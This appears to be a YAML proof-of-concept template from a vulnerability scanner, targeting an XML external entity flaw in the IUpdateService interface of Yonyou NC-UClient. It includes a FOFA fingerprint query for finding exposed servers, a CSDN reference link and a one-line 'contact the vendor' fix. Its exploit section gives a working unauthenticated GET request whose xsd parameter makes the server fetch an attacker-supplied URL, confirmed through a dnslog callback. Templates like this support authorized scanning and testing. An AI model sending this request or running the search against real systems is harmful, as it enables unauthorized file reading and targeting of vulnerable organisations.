product: 用友NC-UClient
vName: 用友NC-UClient IUpdateService XXE
type: 外部实体注入
vID: [ ]
level: 3
vDesc: 用友NClient IUpdateService接口存在XML实体注入漏洞，未经身份认证的攻击者可以通过此漏洞获取敏感信息，读取系统内部文件，使系统处于极不安全状态。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/135431509
fix:
  - 建议联系软件厂商进行处理。
model: dnslog
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://{{m:rep}}
    verify:
      path: ''
      logic: and
      check:
        - model: dnslog